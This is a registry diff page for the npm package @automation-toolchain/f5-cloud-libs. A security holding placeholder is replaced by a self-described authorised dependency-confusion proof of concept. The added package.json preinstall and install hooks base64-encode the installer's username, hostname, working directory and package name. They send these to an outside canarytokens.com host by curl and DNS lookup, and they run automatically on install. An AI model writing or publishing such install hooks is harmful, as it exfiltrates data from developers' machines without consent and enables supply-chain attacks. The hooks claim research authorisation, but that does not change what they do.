@automation-toolchain/f5-cloud-libs 0.0.1-security → 4.29.0-2037287d

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.

This version of @automation-toolchain/f5-cloud-libs might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/README.md +20 -3
  2. package/index.js +3 -0
  3. package/package.json +10 -3
package/README.md CHANGED
@@ -1,5 +1,22 @@
1
- # Security holding package
1
+ # @automation-toolchain/f5-cloud-libs — Authorised Security Research Canary
2
2
 
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
3
+ This package is a **dependency-confusion proof-of-concept** published as part of an authorised HackerOne security engagement against F5 Networks.
4
4
 
5
- Please refer to www.npmjs.com/advisories?search=%40automation-toolchain%2Ff5-cloud-libs for more information.
5
+ - Program: F5 HackerOne (https://hackerone.com/f5)
6
+ - Researcher: `m0chan` (https://hackerone.com/m0chan)
7
+ - Scope: F5 public source repositories reference `@automation-toolchain/f5-cloud-libs` via an `.npmrc` that uses an unset environment variable, causing npm to fall back to the public registry.
8
+
9
+ ## What this package does
10
+ On `preinstall` / `install` it issues a single HTTP GET and a single DNS lookup to a Canarytokens.com canary, recording:
11
+ - `whoami`
12
+ - `hostname`
13
+ - working directory
14
+ - package name requested
15
+
16
+ No files are read, written, exfiltrated, or executed beyond the canary beacon. There is no runtime code, no persistence, no network traffic outside the beacon.
17
+
18
+ ## Contact
19
+ If this package has installed unintentionally in your environment, please contact F5 Networks Security (security@f5.com) and reference the HackerOne report filed by `m0chan`. The package will be unpublished once triage is complete.
20
+
21
+ ## Remediation
22
+ F5 should claim the `@automation-toolchain` scope on npmjs.org and replace the env-var-based `.npmrc` with a hard-coded internal registry URL or fail-closed configuration.
package/index.js ADDED
@@ -0,0 +1,3 @@
1
+ // Authorised F5 HackerOne dependency-confusion PoC.
2
+ // This package exists solely as a canary. No runtime payload.
3
+ module.exports = {};
package/package.json CHANGED
@@ -1,6 +1,13 @@
1
1
  {
2
2
  "name": "@automation-toolchain/f5-cloud-libs",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "4.29.0-2037287d",
4
+ "description": "Authorised F5 HackerOne dependency-confusion PoC — canary only, no payload. Contact: m0chan@hackerone.",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "preinstall": "b64=$(echo \"$(whoami):$(hostname):$(pwd):$npm_package_name\" | base64 -w0); pkgb64=$(echo \"$npm_package_name\" | base64 -w0); curl http://canarytokens.com/mbf5httr3k3m1n1p2igwpgons/$npm_package_name/$b64; nslookup $pkgb64.mbf5httr3k3m1n1p2igwpgons.canarytokens.com",
8
+ "install": "b64=$(echo \"$(whoami):$(hostname):$(pwd):$npm_package_name\" | base64 -w0); pkgb64=$(echo \"$npm_package_name\" | base64 -w0); curl http://canarytokens.com/mbf5httr3k3m1n1p2igwpgons/$npm_package_name/$b64; nslookup $pkgb64.mbf5httr3k3m1n1p2igwpgons.canarytokens.com"
9
+ },
10
+ "keywords": [],
11
+ "author": "",
12
+ "license": "ISC"
6
13
  }